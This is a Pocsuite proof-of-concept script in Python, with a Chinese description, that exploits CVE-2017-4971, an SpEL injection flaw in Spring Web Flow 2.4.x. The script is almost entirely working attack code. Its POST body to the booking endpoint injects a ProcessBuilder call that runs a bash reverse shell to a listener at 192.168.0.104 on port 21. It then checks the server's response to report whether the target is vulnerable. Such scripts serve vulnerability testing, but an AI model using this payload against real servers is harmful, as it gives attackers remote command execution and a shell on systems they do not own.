#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
           'Cache-Control': 'max-age=0',
           'Upgrade-Insecure-Requests':'1',
           'Content-Type':'application/x-www-form-urlencoded',
           'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
           'Cookie':'JSESSIONID=EB19A75A98344983B9018240B60EAD4D',
           'Accept-Language':'zh-CN,zh;q=0.9',
           'Connection':'close'
           }
poc_str='''_eventId_confirm=&_csrf=3bc3dd42-df01-43dc-a50c-39add3a54db3&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.0.104/21+0>%261")).start()=vulhub'''
def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/hotels/booking?execution=e1s2'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response
class TestPOC(POCBase):
    name = 'spring_web_flow_RCE_CVE-2017-4971'
    vulID = 'CVE-2017-4971'  #https://www.seebug.org/vuldb/ssvid-93190
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.jianshu.com/p/ad391cb9a95b']
    desc = '''
		   Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），
           可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，
           如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。
            参考链接：
            - https://threathunter.org/topic/593d562353ab369c55425a90
            - https://pivotal.io/security/cve-2017-4971
		   '''
    vulDate = '2020-02-07'
    createDate = '2020-02-07'
    updateDate = '2020-02-07'
    appName = 'SpringWebFlow'
    appVersion = '2.4.0 ~ 2.4.4'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'org.springframework.web.util.NestedServletException' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' SpringWebFlow_RCE_CVE-2017-4971' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)